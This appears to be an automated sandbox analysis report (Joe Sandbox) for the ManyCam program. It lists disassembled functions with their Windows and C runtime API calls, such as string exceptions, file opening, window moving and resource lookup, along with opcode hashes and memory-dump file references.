??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,?,00000000,00536A69,000000FF,?,004E144B,7EC02BB4), ref: 004E281D
std::bad_exception::bad_exception.LIBCMTD ref: 004E2831
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004E283F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,?,00000000,00536A69,000000FF,?,004E144B), ref: 004E284E

Strings

vector<T> too long, xrefs: 004E2815

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: dc35638380dab2938959a34dbcce56baedfc7c7e4cd6927fef2e7d6d97a3b54c
Instruction ID: 0a4d440cb5536f40db0fd076e9c7fc5d2a12fc606929b1cb6c9b0b09eff913f8
Opcode Fuzzy Hash: dc35638380dab2938959a34dbcce56baedfc7c7e4cd6927fef2e7d6d97a3b54c
Instruction Fuzzy Hash: B4F03CB1944648EBCB14DF94ED45B9DBB78FB14720F50426AA812A32D0DB756A08CB54

Function 00412890 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00528FB9,000000FF,?,00411C76,?,7EC02BB4), ref: 004128BD
std::bad_exception::bad_exception.LIBCMTD ref: 004128D1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004128DF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00528FB9,000000FF,?,00411C76,?), ref: 004128EE

Strings

vector<T> too long, xrefs: 004128B5

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: c780cc5cd66b70a61fb923b6734da329fed68386e0d1462283d30a24de8a1d3f
Instruction ID: 4f722f1132bf029aa43680a0f31b4d6b59234f2f3b0eea29470ee80f38ab1d71
Opcode Fuzzy Hash: c780cc5cd66b70a61fb923b6734da329fed68386e0d1462283d30a24de8a1d3f
Instruction Fuzzy Hash: B3F08CB1904248EBCB14DF90ED41B9DBB78FB04720F40022AB812A32C0EB756A08CB54

Function 004D4940 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00535729,000000FF,?,004D3CB6,00000000,7EC02BB4), ref: 004D496D
std::bad_exception::bad_exception.LIBCMTD ref: 004D4981
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004D498F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00535729,000000FF,?,004D3CB6,00000000), ref: 004D499E

Strings

vector<T> too long, xrefs: 004D4965

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: f5e9ddf57e258ff8f81d687b94cbb6babb7938dca145e5172867018050d52fb0
Instruction ID: 2198fcef12488e2d17d3691da39b82749544227340ee56d3737a145847e009f6
Opcode Fuzzy Hash: f5e9ddf57e258ff8f81d687b94cbb6babb7938dca145e5172867018050d52fb0
Instruction Fuzzy Hash: 21F0A9B1904648EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32C0EB756A08CB54

Function 0048EBA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00531039,000000FF,?,0048BAC3,?), ref: 0048EBCD
std::bad_exception::bad_exception.LIBCMTD ref: 0048EBE1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0048EBEF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00531039,000000FF,?,0048BAC3,?), ref: 0048EBFE

Strings

vector<T> too long, xrefs: 0048EBC5

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 1ea01a54b671203e94099090e90c6f810493855dc45a6ce695e3d5e9399e45a7
Instruction ID: 92daabea73afc4e90302cbcf7baf13e44f6b9f868eface51cfc7e975ed78bb7a
Opcode Fuzzy Hash: 1ea01a54b671203e94099090e90c6f810493855dc45a6ce695e3d5e9399e45a7
Instruction Fuzzy Hash: 95F03CB1944648EBCB14DFA4ED45B9DBB78FB14720F50426AE812A32D0DB756A08CB54

Function 0044ED50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,0052CF99,000000FF,?,0044CB83,00000000), ref: 0044ED7D
std::bad_exception::bad_exception.LIBCMTD ref: 0044ED91
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0044ED9F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052CF99,000000FF,?,0044CB83,00000000), ref: 0044EDAE

Strings

vector<T> too long, xrefs: 0044ED75

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 5b8e1bbaaa4858481c8b052d95aae316f4802631e30b8cefb630b981b18aab31
Instruction ID: f5a7866f547bb55f07dc25e2db114e65ea79899798aec203e725cd6f1ff4eb0e
Opcode Fuzzy Hash: 5b8e1bbaaa4858481c8b052d95aae316f4802631e30b8cefb630b981b18aab31
Instruction Fuzzy Hash: E2F0AFB1904248EBCB14DF90ED41FDDBB78FB04720F40022AF812A32C0EB756A08CB54

Function 00430D10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,0052A699,000000FF,?,004301A3,00000000), ref: 00430D3D
std::bad_exception::bad_exception.LIBCMTD ref: 00430D51
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 00430D5F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052A699,000000FF,?,004301A3,00000000), ref: 00430D6E

Strings

vector<T> too long, xrefs: 00430D35

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 4e7c7e61b8e4b61418f89952c155b68a96c666f8f64ae422fdef5ea6b294711e
Instruction ID: 2c432eddfbe67746ec497c333af96acf5ab7e20aac0011f52034aeffc7690669
Opcode Fuzzy Hash: 4e7c7e61b8e4b61418f89952c155b68a96c666f8f64ae422fdef5ea6b294711e
Instruction Fuzzy Hash: 43F0A9B1904248EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32D0EB756A08CB54

Function 0049EEA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00531FD9,000000FF,?,0049E8F3,?), ref: 0049EECD
std::bad_exception::bad_exception.LIBCMTD ref: 0049EEE1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0049EEEF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00531FD9,000000FF,?,0049E8F3,?), ref: 0049EEFE

Strings

vector<T> too long, xrefs: 0049EEC5

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 164d6ffe732d9fa8baa0de175643794e8cd3c3d995353351aea268910f753e13
Instruction ID: 9df2125c4ef5457798524062e3a11b60d2f3a7f222f2b8b9a439bf1f8e3d57c1
Opcode Fuzzy Hash: 164d6ffe732d9fa8baa0de175643794e8cd3c3d995353351aea268910f753e13
Instruction Fuzzy Hash: 0DF03CB1944648EBCB14DFA4ED45B9DBB78FB14720F50426AB812A32D0DB756A08CB54

Function 00B99E10 Relevance: 7.7, APIs: 5, Instructions: 166fileCOMMON

Download Yara Rule

APIs

_setjmp3.MSVCR80 ref: 00B99E8C
fopen.MSVCR80 ref: 00B99EBE
??2@YAPAXI@Z.MSVCR80(?), ref: 00B99F47
fclose.MSVCR80 ref: 00B9A02C
??3@YAXPAX@Z.MSVCR80(?,?), ref: 00B9A042

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ??2@??3@_setjmp3fclosefopen
String ID:
API String ID: 1448151454-0
Opcode ID: 291fe1d9f172636f3e291bf8b6812345e5dcda22a56255e5b6fa00555a86c8bc
Instruction ID: d06e7f98f4fce1b563f259670deb6dac49d5ca5a697b9d842b0c1adfd2f27970
Opcode Fuzzy Hash: 291fe1d9f172636f3e291bf8b6812345e5dcda22a56255e5b6fa00555a86c8bc
Instruction Fuzzy Hash: AE5139B1D002689BDF34DF24CC81BDEB7B8AB14704F1445EAE919A7241EA719AC4CF91

Function 00B95020 Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000001,00000000,00000000,00000000), ref: 00B95149

Part of subcall function 00B94F90: GdiFlush.GDI32(00B95056,?,?,00000000,00000000,00000000), ref: 00B94F93
Part of subcall function 00B94F90: GetCurrentObject.GDI32(?,00000007), ref: 00B94FA3

Part of subcall function 00B94F00: GetClientRect.USER32(?,00000000), ref: 00B94F0F
Part of subcall function 00B94F00: GetWindowRect.USER32(?,?), ref: 00B94F22
Part of subcall function 00B94F00: SubtractRect.USER32(?,?,?), ref: 00B94F41

MoveWindow.USER32(?,?,?,?,?,00000000,00000000), ref: 00B950B0
GetClientRect.USER32(?,?), ref: 00B950BB
GetWindowRect.USER32(?,?), ref: 00B950CA
MoveWindow.USER32(?,?,?,00000001,00000001,00000001,?,?,?,?,00000000,00000000), ref: 00B95106

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: RectWindow$Move$Client$CurrentFlushObjectSubtract
String ID:
API String ID: 1830049877-0
Opcode ID: 47e49916515b5b45f3a5eed3e55e8203f3d94b25e291275b671f28226cd7c067
Instruction ID: c7e261da9445f927d84646201548ba3b1631921ca65e40c5186dfadc23442445
Opcode Fuzzy Hash: 47e49916515b5b45f3a5eed3e55e8203f3d94b25e291275b671f28226cd7c067
Instruction Fuzzy Hash: 50416C71614201AFCB04DF68DD85EABBBE9FFC8314F048A6DF989A3214D634E945CB91

Function 00B980A0 Relevance: 7.6, APIs: 6, Instructions: 104stringCOMMON

Download Yara Rule

APIs

strchr.MSVCR80 ref: 00B980CA
strchr.MSVCR80 ref: 00B980DD
strchr.MSVCR80 ref: 00B9810F
strchr.MSVCR80 ref: 00B98126
tolower.MSVCR80 ref: 00B98159
tolower.MSVCR80 ref: 00B98165

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: strchr$tolower
String ID:
API String ID: 1960513771-0
Opcode ID: 78d6ed3ac16ddc681d6d304668006f0464c0f222f9c586bfa0624076d78cdd1e
Instruction ID: 4bca845c4c878a1a561266e20a3a86b4ae2f956c531e1195ae80e54aa7a9dc9a
Opcode Fuzzy Hash: 78d6ed3ac16ddc681d6d304668006f0464c0f222f9c586bfa0624076d78cdd1e
Instruction Fuzzy Hash: E3313A7254431657CF20DFA4AC8076AB7D5EF9A311F08047AEE44E7211FE72D94A87A1

Function 00506EF0 Relevance: 7.6, APIs: 5, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00506F28

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

??2@YAPAXI@Z.MSVCR80(00000004,00565168,7EC02BB4,?,?,?,?,?,?,?,?,?,?,00539108,000000FF), ref: 00506F2F
codecvt.LIBCPMTD ref: 00506F9F
wcstol.MSVCR80 ref: 00506FEE
codecvt.LIBCPMTD ref: 00507011

Part of subcall function 00415BF0: ??3@YAXPAX@Z.MSVCR80(?,?,?,00415B3D,00000000,?,00415660,?,00000000,?,00415162,?,?,004141EC,00000000,?), ref: 00415C0B

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapcodecvt$??2@??3@wcstol
String ID:
API String ID: 74129304-0
Opcode ID: f820b669af4b91f01ff1afac2cb9a1d8ae762e6116985bebba3912421fffcbed
Instruction ID: 6d66b3f1b8e0294eece4e25a7ed8cbe839a85e6d975fee0ec5976f71f30e8fe7
Opcode Fuzzy Hash: f820b669af4b91f01ff1afac2cb9a1d8ae762e6116985bebba3912421fffcbed
Instruction Fuzzy Hash: 7E4103B0D05209EFDB14DF94D895BEEBBB0BB48314F20852AE416AB2C0DB756A45CF94

Function 0046C100 Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00569E8C), ref: 0046C121
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C16B
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C17D
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C19E
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080,?,00000000,00000000,00000000), ref: 0046C1DC

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: cbcd1fa559f8ae4230e768bd00e513c0907913d8661ee28b925d20b683ff2109
Instruction ID: c9f41260a9b7f310c3a2772d0b559dbbeee8ca943a5465fee336bfd2e85e9abf
Opcode Fuzzy Hash: cbcd1fa559f8ae4230e768bd00e513c0907913d8661ee28b925d20b683ff2109
Instruction Fuzzy Hash: E3310DB5A40208BFEB04DF94CC96FAF77B9FB48704F108549F615EB280D675A940DB94

Function 00B9A7E0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

isdigit.MSVCR80 ref: 00B9A7F2
isspace.MSVCR80 ref: 00B9A82B
isspace.MSVCR80 ref: 00B9A83E
isdigit.MSVCR80 ref: 00B9A848
isdigit.MSVCR80 ref: 00B9A87A

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: isdigit$isspace
String ID:
API String ID: 4135990190-0
Opcode ID: 24aa94b61cd639e26a12a2348c5e1db151e3ef1f3f9f5e054ac515bace35fe26
Instruction ID: e7d34af844dbeb03295b41f834af5328b631e20ac2c5b5b20a05bea2e1f0d1c8
Opcode Fuzzy Hash: 24aa94b61cd639e26a12a2348c5e1db151e3ef1f3f9f5e054ac515bace35fe26
Instruction Fuzzy Hash: 50118031B112194BEE216B256CD567F73E9DE41398F0804B5EC42D7252FF09EE1A82EB

Function 00488A00 Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(00000000,0047AE1E,00000006,?,0047AE1E), ref: 00488A3B
GetLastError.KERNEL32(?,0047AE1E), ref: 00488A4A
SizeofResource.KERNEL32(00000000,00000000,?,0047AE1E), ref: 00488A5A
GetLastError.KERNEL32(?,0047AE1E), ref: 00488A67
GetLastError.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000,?,0047AE1E), ref: 00488AA8

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: ErrorLast$Resource$FindSizeof
String ID:
API String ID: 1187693681-0
